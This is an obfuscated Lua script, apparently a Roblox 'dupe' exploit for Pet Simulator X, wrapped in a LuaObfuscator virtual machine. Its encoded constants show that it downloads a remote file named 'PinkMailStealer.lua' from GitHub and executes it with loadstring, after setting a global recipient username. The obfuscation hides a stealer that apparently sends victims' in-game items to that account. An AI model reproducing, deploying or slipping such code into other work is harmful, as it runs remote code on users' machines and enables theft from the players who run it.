--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (5==v0) then v16=nil;v16=function(v23,v24,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==5) then v39=nil;v39=function(v40,v41,v42)local v48=0;local v49;local v50;local v51;while true do if (v48==1) then v51=v40[3];return function(...)local v90=1;local v91= -1;local v92={...};local v93=v13("#",...) -1;local function v94()local v95=v49;local v96=v50;local v97=v51;local v98=v37;local v99={};local v100={};local v101={};for v105=0,v93 do if (((11822 -7231)>(3847 -2100)) and (v105>=v97)) then v99[v105-v97]=v92[v105 + 1 + 0];else v101[v105]=v92[v105 + 1];end end local v102=(v93-v97) + (1553 -(2 + 3 + 1547));local v103;local v104;while true do local v106=906 -(701 + 205);local v107;while true do if ((693==(1385 -692)) and (v106==(1876 -(832 + 1044)))) then v107=162 -(99 + (1355 -(189 + 1103)));while true do if (((603 -(265 + 338))==v107) or (3225<=((3172 -(266 + 116)) -(1340 + 56)))) then local v125=0 + 0;while true do if ((v125==0) or ((3284 -(441 + 1641))>=(10609 -7581))) then v103=v95[v90];v104=v103[1466 -((1857 -(482 + 537)) + 627)];v125=(2072 -(252 + 702)) -((1689 -(467 + 1187)) + 1082);end if (((973 -(365 + 489))<((18475 -13854) + 268)) and (1==v125)) then v107=1;break;end end end if ((v107==1) or ((1706 + 675 + 601)>4995)) then if ((v104<=4) or ((4644 -(1291 + 35))<(8615 -5671))) then if ((4923>(915 + 2385)) and (v104<=(1 + 0))) then if ((v104>(0 + 0)) or (((8073 + 1700) -5594)<=(3547 -(1412 + 463)))) then v90=v103[3 + 0];else v101[v103[2]]();end elseif ((v104<=(9 -7)) or (3640<=(1202 -((1198 -912) + 607)))) then local v134=0;local v135;local v136;while true do if ((v134==(2 -1)) or ((4564 -(957 + 729))>4310)) then while true do if (((4156 -(300 + 205))==3651) and (v135==(494 -(50 + 444)))) then v136=v103[2];v101[v136]=v101[v136](v14(v101,v136 + 1 + 0,v91));break;end end break;end if ((v134==(0 + 0)) or ((717 + 4101)<=(5448 -(813 + 1040)))) then v135=0 + 0;v136=nil;v134=2 -1;end end elseif ((v104>3) or ((161 + 26)>=((1663 + 590) -(340 + (572 -322))))) then v101[v103[6 -4]]=v103[773 -(138 + 632)];else local v145=(1628 -(1176 + 452)) -0;local v146;local v147;local v148;local v149;local v150;while true do if ((v145==(1596 -(910 + 684))) or ((1654 + 123)>=(235 + 330 + 3589))) then v150=nil;while true do if ((v146==(0 -(1271 -(476 + 795)))) or (((6865 -(451 + 1124)) -2901)==(4825 -2004))) then local v175=0 + 0;while true do if (((1266 + 68)>=(878 + 231)) and (v175==(1464 -(1242 + 222)))) then v147=v103[2 + 0];v148,v149=v98(v101[v147](v14(v101,v147 + (297 -(153 + 143)),v103[4 -1])));v175=45 -(5 + 39);end if ((v175==(1 + 0)) or (((390 + 4414) -(166 + 76 + 1016))==(4922 -(249 + 2)))) then v146=1;break;end end end if ((v146==(5 -(991 -(314 + 674)))) or ((216 + 1013)==(4444 -(742 + 1135)))) then for v176=v147,v91 do local v177=1994 -((1474 -468) + 988);local v178;local v179;while true do if (((1893 + 2676)>(3671 + 368)) and (v177==(0 + 0 + 0))) then v178=0;v179=nil;v177=3 -2;end if ((v177==(4 -3)) or ((1391 -1025)>(6716 -4249))) then while true do if ((v178==(0 + 0)) or ((4631 -(299 + (2413 -(983 + 397))))==(5477 -(1775 + 139)))) then v179=0 + 0;while true do if ((v179==(1973 -(100 + 1873))) or ((3188 -(160 + (2732 -(9 + 943))))==(11109 -6625))) then v150=v150 + (4 -3);v101[v176]=v148[v150];break;end end break;end end break;end end end break;end if (((1062 -(182 + 879))==v146) or (4276>(15694 -11291))) then v91=(v149 + v147) -((163 -(62 + 99)) -1);v150=1672 -(90 + 1582);v146=2 -0;end end break;end if ((((4088 + 2946) -5129)==1905) and (v145==(0 + (0 -0)))) then v146=0 -0;v147=nil;v145=1;end if ((v145==(1 + 0)) or (((373 -(77 + 206)) + 629)>=(1535 -377))) then v148=nil;v149=nil;v145=2;end end end elseif ((v104<=7) or ((2622 + 1191)>=(2821 + 1361))) then if (((8439 -5241)>(5633 -3584)) and (v104<=(8 -3))) then local v137=0;local v138;local v139;local v140;while true do if (((0 + 0)==v137) or ((4823 -(962 + 571))<(753 + 1585))) then v138=0;v139=nil;v137=1 + 0;end if (((5639 -(657 + 526))>(6804 -3584)) and (v137==(1 + 0))) then v140=nil;while true do if ((v138==(1477 -(650 + 826))) or (1460<(502 + 211))) then v101[v139 + 1]=v140;v101[v139]=v140[v103[4]];break;end if ((3433==(8432 -4999)) and ((0 -0)==v138)) then local v168=0 -0;while true do if (((3834 -3035)>(1157 -(404 + 699))) and (v168==1)) then v138=1 -0;break;end if (((719 + 1411)>230) and ((0 -0)==v168)) then v139=v103[1590 -(281 + 1307)];v140=v101[v103[3]];v168=1 -0;end end end end break;end end elseif ((v104==(1454 -(281 + 1167))) or (4919<((3917 -(759 + 441)) -(302 + 307)))) then v101[v103[1602 -((1215 -(255 + 397)) + 1037)]]=v103[(2540 -1880) -((719 -(129 + 338)) + 405)]~=(539 -(99 + 440));else do return;end end elseif ((v104<=(29 -21)) or (4614<(3965 -(763 + 183)))) then v101[v103[3 -(1820 -(954 + 865))]]=v42[v103[1 + 2]];elseif (((13299 -9919)==(8976 -5596)) and (v104==9)) then v101[v103[9 -7]][v103[181 -(61 + 117)]]=v103[4 + (0 -0)];elseif ((v101[v103[2]]==v103[967 -(857 + 106)]) or ((4526 -(1627 + 70))==(3544 -2556))) then v90=v90 + 1;else v90=v103[1821 -(171 + 1647)];end v90=v90 + 1 + 0;break;end end break;end end end end A,B=v37(v12(v94));if  not A[1] then local v108=0;local v109;while true do if (v108==0) then v109=v40[4][v90] or "?";error("Script error at ["   .. v109   .. "]:"   .. A[2]);break;end end else return v14(A,2,B);end end;end if (v48==0) then v49=v40[1];v50=v40[2];v48=1;end end end;return v39(v38(),{},v24)(...);end if (v27==1) then v30=function(v43,v44,v45)if v45 then local v80=174 -(30 + 144);local v81;while true do if (v80==(0 -0)) then v81=(v43/((2 + (0 -0))^(v44-(1164 -(793 + 370)))))%((1523 -(782 + 739))^(((v45-(1 + 0)) -(v44-(4 -3))) + (1976 -(37 + 1542 + 396))));return v81-(v81%(1 -0));end end else local v82=0 + 0;local v83;while true do if (v82==(1144 -((2471 -1780) + 453))) then v83=(3 -1)^(v44-(2 -1));return (((v43%(v83 + v83))>=v83) and (1 -0)) or (0 + 0);end end end end;v31=nil;v31=function()local v52=0;local v53;while true do if (v52==(430 -(94 + 336))) then v53=v2(v23,v28,v28);v28=v28 + (389 -(129 + 259));v52=3 -(2 + 0);end if (v52==(4 -3)) then return v53;end end end;v32=nil;v27=2;end if (v27==2) then v32=function()local v54,v55=v2(v23,v28,v28 + 1 + 1);v28=v28 + 2 + 0;return (v55 * (200 + 56)) + v54;end;v33=nil;v33=function()local v56,v57,v58,v59=v2(v23,v28,v28 + (1333 -((2179 -1088) + 239)));v28=v28 + (17 -13);return (v59 * (4545629 + 8767124 + 3464463)) + (v58 * 65536) + (v57 * (702 -446)) + v56;end;v34=nil;v27=3;end if (v27==0) then v28=1;v29=nil;v23=v5(v4(v23,5),"..",function(v46)if (v2(v46,2)==79) then local v84=0;while true do if (0==v84) then v29=v1(v4(v46,1,1));return "";end end else local v85=0;local v86;while true do if (v85==0) then v86=v3(v1(v46,16));if v29 then local v114=v6(v86,v29);v29=nil;return v114;else return v86;end break;end end end end);v30=nil;v27=1;end if (v27==3) then v34=function()local v60=v33();local v61=v33();local v62=1708 -(541 + 1166);local v63=(v30(v61,1,57 -37) * ((5 -3)^32)) + v60;local v64=v30(v61,57 -36,388 -(86 + 271));local v65=((v30(v61,(435 -(153 + 274)) + 5 + 19)==(1 + 0)) and  -(1 -0)) or (266 -(77 + 188));if (v64==(0 -0)) then if (v63==(0 + 0)) then return v65 * (0 + 0);else v64=363 -(361 + 1);v62=0 + 0;end elseif (v64==2047) then return ((v63==(0 + 0)) and (v65 * ((1 + (1574 -(181 + 1393)))/0))) or (v65 * NaN);end return v9(v65,v64-(2051 -(400 + 628))) * (v62 + (v63/((7 -5)^((859 + 295) -(770 + 332)))));end;v35=nil;v35=function(v47)local v66;if  not v47 then v47=v33();if (v47==(0 -0)) then return "";end end v66=v4(v23,v28,(v28 + v47) -(1070 -(34 + 1035)));v28=v28 + v47;local v67={};for v78=1, #v66 do v67[v78]=v3(v2(v4(v66,v78,v78)));end return v7(v67);end;v36=v33;v27=4;end if (4==v27) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v68=519 -(204 + 315);local v69;local v70;local v71;local v72;local v73;local v74;local v75;local v76;local v77;while true do if (v68~=(1745 -(506 + 1238))) then else v71=nil;v72=nil;v68=1530 -(160 + 1368);end if (v68==(10 -7)) then v75=nil;v76=nil;v68=6 -2;end if (v68==(2 -0)) then v73=nil;v74=nil;v68=3;end if (v68==(0 -0)) then v69=889 -(113 + 776);v70=nil;v68=1210 -(450 + 759);end if (v68==(634 -(496 + 134))) then v77=nil;while true do if (4==v69) then while true do if (v70~=(4 -2)) then else local v119=1883 -(1832 + 51);while true do if (v119==1) then v70=3;break;end if ((0 -0)==v119) then local v126=0;while true do if (v126==(1858 -(346 + 1511))) then v119=1926 -(275 + 1650);break;end if (v126==(0 + 0)) then v75=nil;v76=nil;v126=1 -0;end end end end end if (v70==(168 -(60 + 107))) then local v120=0;local v121;while true do if (v120==(1539 -(1169 + 370))) then v121=0 -0;while true do if (v121==(1718 -(685 + 1033))) then v73=nil;v74=nil;v121=1;end if (v121==(1 + 0)) then v70=2;break;end end break;end end end if (v70~=(0 + 0)) then else local v122=1932 -(419 + 1513);local v123;while true do if (v122==(467 -(449 + 18))) then v123=1904 -(1522 + 382);while true do if ((1045 -(163 + 881))==v123) then v70=258 -(221 + 36);break;end if (v123~=(0 + 0)) then else v71=0;v72=nil;v123=1;end end break;end end end if (v70~=(190 -(71 + 116))) then else v77=nil;while true do local v124=0 -0;while true do if (v124==(1 + 0)) then if (v71==(8 -6)) then local v131=0;while true do local v132=0 -0;while true do if (v132==0) then if (v131~=(0 -0)) then else local v154=0 + 0;while true do if (v154==1) then v131=4 -3;break;end if (v154~=(0 -0)) then else for v169=771 -(65 + 705),v33() do local v170=774 -(120 + 654);local v171;local v172;while true do if (v170==(963 -(512 + 451))) then v171=0 + 0;v172=nil;v170=1 + 0;end if (v170==(1539 -(1472 + 66))) then while true do if (v171==(0 + 0)) then v172=v31();if (v30(v172,1 -0,1)==0) then local v198=0 -0;local v199;local v200;local v201;local v202;local v203;local v204;while true do if (v198==(850 -(672 + 176))) then v203=nil;v204=nil;v198=5 -2;end if (0==v198) then v199=0;v200=nil;v198=1951 -(1880 + 70);end if (v198~=(7 -4)) then else while true do if ((1120 -(278 + 842))~=v199) then else local v210=157 -(146 + 11);while true do if (v210~=(2 -1)) then else v199=1 + 0;break;end if (v210~=(519 -(340 + 179))) then else v200=0 -0;v201=nil;v210=1;end end end if (v199~=(2 -0)) then else v204=nil;while true do if (v200==(3 -1)) then while true do if ((0 + 0)~=v201) then else local v215=0 -0;local v216;while true do if (v215==(1525 -(262 + 1263))) then v216=942 -(560 + 382);while true do if (v216~=(3 -2)) then else v201=1 -0;break;end if (v216==(0 -0)) then local v226=1178 -(1143 + 35);while true do if (v226==(1555 -(839 + 716))) then v202=v30(v172,2 -0,1 + 2);v203=v30(v172,4,1271 -(1166 + 99));v226=2 -1;end if (v226~=(1 -0)) then else v216=489 -(201 + 287);break;end end end end break;end end end if (v201==(1779 -(1385 + 392))) then local v217=0;local v218;while true do if ((0 + 0)~=v217) then else v218=1480 -(805 + 675);while true do if (v218==(2 -1)) then v201=1810 -(780 + 1027);break;end if (v218~=(0 -0)) then else local v227=358 -(166 + 192);while true do if (v227==(516 -(318 + 198))) then local v228=0;while true do if (v228~=1) then else v227=1450 -(81 + 1368);break;end if (v228==(0 -0)) then if (v30(v203,685 -(301 + 383),3 -2)~=1) then else v204[2]=v77[v204[931 -(230 + 699)]];end if (v30(v203,9 -7,502 -(476 + 24))==1) then v204[1869 -(1400 + 466)]=v77[v204[2 + 1]];end v228=1;end end end if (v227~=(1 + 0)) then else v218=1 + 0;break;end end end end break;end end end if (v201==(2 + 1)) then if (v30(v203,3,3 + 0)~=(776 -(331 + 444))) then else v204[4]=v77[v204[10 -6]];end v72[v169]=v204;break;end if ((1672 -(159 + 1512))==v201) then local v220=1884 -(1583 + 301);local v221;local v222;while true do if (v220==(2 -1)) then while true do if ((1073 -(447 + 626))~=v221) then else v222=0 -0;while true do if (v222~=(0 -0)) then else local v229=0 + 0;local v230;while true do if (v229~=(0 + 0)) then else v230=0;while true do if (v230~=(1 + 0)) then else v222=1;break;end if (v230==(0 -0)) then local v235=0 + 0;while true do if (v235==(1 + 0)) then v230=1;break;end if (v235~=(0 + 0)) then else v204={v32(),v32(),nil,nil};if (v202==0) then local v236=703 -(667 + 36);local v237;local v238;local v239;while true do if (v236~=0) then else v237=0 + 0;v238=nil;v236=4 -3;end if (v236==(1 + 0)) then v239=nil;while true do if (v237==(1444 -(702 + 742))) then local v242=0;while true do if (v242==(1174 -(27 + 1146))) then v237=400 -(163 + 236);break;end if (v242==(0 + 0)) then v238=1676 -(154 + 1522);v239=nil;v242=1 + 0;end end end if (v237~=(1 + 0)) then else while true do if (v238==0) then v239=0 -0;while true do if (v239==(0 + 0)) then v204[1495 -(1008 + 484)]=v32();v204[1 + 3]=v32();break;end end break;end end break;end end break;end end elseif (v202==(1 + 0)) then v204[2 + 1]=v33();elseif (v202==(1 + 1)) then v204[833 -(820 + 10)]=v33() -(2^16);elseif (v202==(3 -0)) then local v243=0 -0;local v244;local v245;local v246;while true do if (1~=v243) then else v246=nil;while true do if (v244~=(827 -(717 + 109))) then else while true do if (v245==0) then v246=0;while true do if (v246~=0) then else v204[3 -0]=v33() -((1301 -(177 + 1122))^(29 -13));v204[1377 -(50 + 1323)]=v32();break;end end break;end end break;end if (v244==(0 + 0)) then local v249=0 -0;while true do if (v249==0) then v245=1056 -(6 + 1050);v246=nil;v249=1;end if (v249~=1) then else v244=1;break;end end end end break;end if (v243==(0 + 0)) then v244=0 + 0;v245=nil;v243=1 + 0;end end end v235=1448 -(490 + 957);end end end end break;end end end if (v222~=(1986 -(268 + 1717))) then else v201=2 + 0;break;end end break;end end break;end if (v220==(0 + 0)) then v221=0 + 0;v222=nil;v220=1 -0;end end end end break;end if (v200~=(0 -0)) then else local v212=437 -(297 + 140);local v213;while true do if (v212==(0 + 0)) then v213=122 -(19 + 103);while true do if (v213==0) then local v225=0 -0;while true do if (v225~=(1 + 0)) then else v213=1 + 0;break;end if (v225==0) then v201=0 + 0;v202=nil;v225=1 + 0;end end end if (v213==1) then v200=1 -0;break;end end break;end end end if (v200~=(1919 -(329 + 1589))) then else local v214=0 + 0;while true do if (v214==(0 -0)) then v203=nil;v204=nil;v214=1117 -(558 + 558);end if (v214==1) then v200=2 -0;break;end end end end break;end if (v199~=1) then else local v211=0;while true do if (1==v211) then v199=1 + 1;break;end if (0~=v211) then else v202=nil;v203=nil;v211=1 -0;end end end end break;end if (v198==(1535 -(1272 + 262))) then v201=nil;v202=nil;v198=7 -5;end end end break;end end break;end end end for v173=1286 -(1244 + 41),v33() do v73[v173-(1584 -(160 + 1423))]=v38();end v154=1 + 0;end end end if (v131==(1144 -(1004 + 139))) then local v155=0 + 0;local v156;while true do if ((0 -0)==v155) then v156=0 -0;while true do if (v156~=(756 -(707 + 49))) then else local v182=0;while true do if (v182==0) then for v191=1450 -(519 + 930),v33() do v74[v191]=v33();end return v75;end end end end break;end end end break;end end end end break;end if ((1496 -(696 + 800))==v124) then local v127=1185 -(1040 + 145);local v128;while true do if (v127~=(0 + 0)) then else v128=0;while true do if (v128==(0 + 0)) then if (v71~=(1 + 0)) then else local v157=0 + 0;local v158;while true do if (v157~=0) then else v158=0;while true do if (v158~=2) then else v71=1 + 1;break;end if (v158~=(299 -(113 + 186))) then else local v183=0 + 0;local v184;while true do if (v183~=0) then else v184=0 -0;while true do if (v184==1) then v158=1 + 0;break;end if (v184==(0 -0)) then local v205=262 -(190 + 72);while true do if (v205==(1 + 0)) then v184=1618 -(1009 + 608);break;end if (v205==(0 + 0)) then v76=v33();v77={};v205=1;end end end end break;end end end if (v158==1) then local v185=0;while true do if (v185==(0 -0)) then for v193=813 -(657 + 155),v76 do local v194=0;local v195;local v196;local v197;while true do if (v194==(0 + 0)) then v195=0;v196=nil;v194=1 -0;end if (v194~=1) then else v197=nil;while true do if (v195==(4 -3)) then if (v196==(1 + 0)) then v197=v31()~=(1708 -(1687 + 21));elseif (v196==(1 + 1)) then v197=v34();elseif (v196~=3) then else v197=v35();end v77[v193]=v197;break;end if ((336 -(211 + 125))==v195) then local v209=475 -(244 + 231);while true do if (v209==(0 + 0)) then v196=v31();v197=nil;v209=1 + 0;end if (v209==(1 + 0)) then v195=1;break;end end end end break;end end end v75[3]=v31();v185=1 -0;end if (v185==(1616 -(1122 + 493))) then v158=2;break;end end end end break;end end end if (v71==(0 + 0)) then local v159=0 + 0;local v160;local v161;while true do if (v159~=(0 + 0)) then else v160=482 -(294 + 188);v161=nil;v159=1;end if (v159==(1 + 0)) then while true do if (v160~=(817 -(190 + 627))) then else v161=1223 -(570 + 653);while true do if (v161~=0) then else local v188=0;while true do if (v188~=0) then else v72={};v73={};v188=1;end if (v188~=(1658 -(976 + 681))) then else v161=1;break;end end end if (v161==2) then v71=1 + 0;break;end if (v161~=1) then else local v189=0 + 0;local v190;while true do if (v189~=(0 + 0)) then else v190=0;while true do if (v190~=(1 -0)) then else v161=1 + 1;break;end if (v190~=(0 -0)) then else v74={};v75={v72,v73,nil,v74};v190=1 + 0;end end break;end end end end break;end end break;end end end v128=203 -(134 + 68);end if ((2 -1)==v128) then v124=2 -1;break;end end break;end end end end end break;end end break;end if (v69~=(2 + 1)) then else local v110=0;while true do if ((0 + 0)==v110) then v76=nil;v77=nil;v110=683 -(622 + 60);end if (v110~=1) then else v69=11 -7;break;end end end if (v69==(1816 -(46 + 1768))) then local v111=0;while true do if (v111==(463 -(236 + 227))) then v74=nil;v75=nil;v111=3 -2;end if (v111==(1 + 0)) then v69=3;break;end end end if (v69==(1 + 0)) then local v112=1678 -(797 + 881);while true do if ((0 -0)~=v112) then else v72=nil;v73=nil;v112=3 -2;end if (v112==(245 -(106 + 138))) then v69=1 + 1;break;end end end if (v69==(952 -(521 + 431))) then local v113=0 -0;while true do if (v113~=(1 + 0)) then else v69=1;break;end if (v113==0) then v70=1771 -(894 + 877);v71=nil;v113=1;end end end end break;end end end;v27=5;end end end;v16("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403593O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4F6C69776965724973547279486172642F447570655363726970745053582F6D61696E2F50696E6B4D61696C537465616C65722E6C756103023O005F4703043O004E616D6503113O005363722O656E4C6F6164696E675465787403083O00557365726E616D6503103O00526F626C6F785F4E2O65644E6572643100153O0012043O00013O00260A3O000C000100020004013O000C0001001208000100033O001208000200043O002005000200020005001204000400064O0006000500014O0003000200054O000200013O00024O0001000100010004013O0014000100260A3O0001000100010004013O00010001001208000100073O003009000100080009001208000100073O0030090001000A000B0012043O00023O0004013O000100012O00073O00017O00153O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v10(),...);break;end if (v0==4) then v13=select;v14=unpack or table.unpack;v15=tonumber;v0=5;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==3) then v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=4;end end end
